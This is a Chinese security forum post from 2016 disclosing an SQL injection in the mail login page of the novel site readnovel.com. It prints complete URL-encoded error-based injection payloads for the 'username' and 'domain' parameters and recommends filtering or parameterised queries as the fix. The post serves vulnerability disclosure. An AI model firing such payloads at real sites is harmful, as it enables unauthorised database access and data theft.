HanDs
管理员

[7月漏洞公开] 小说阅读网某站存在SQL注入 





学习中请遵循国家相关法律法规,黑客不作恶。没有网络安全就没有国家安全

本站需要登陆后才能查看

rt

详细说明:

code 区域
不知道重复了没,2 处 注入

https://mail.readnovel.com/extmail/cgi/index.cgi


参数 username
bakecookie=on&domain=1&nosameip=on&password=myPassw0rd&username='and(select%201%20from(select%20count(*)%2cconcat((select%20concat(user())%20from%20information_schema.tables%20limit%200%2c1)%2cfloor(rand(0)*2))x%20from%20information_schema.tables%20group%20by%20x)a)and'
参数 domain
bakecookie=on&domain='and(select%201%20from(select%20count(*)%2cconcat((select%20concat(user())%20from%20information_schema.tables%20limit%200%2c1)%2cfloor(rand(0)*2))x%20from%20information_schema.tables%20group%20by%20x)a)and'&nosameip=on&password=myPassw0rd&username=aaaaaa

漏洞证明:

QQ图片20160525000451.png





QQ图片20160525000514.png

修复方案:

过滤或者参数化


学习中请遵守法律法规,本网站内容均来自于互联网,本网站不负担法律责任
小说 翟亩镣
#1楼
发帖时间:2016-7-9   |   查看数:0   |   回复数:0
游客组
快速回复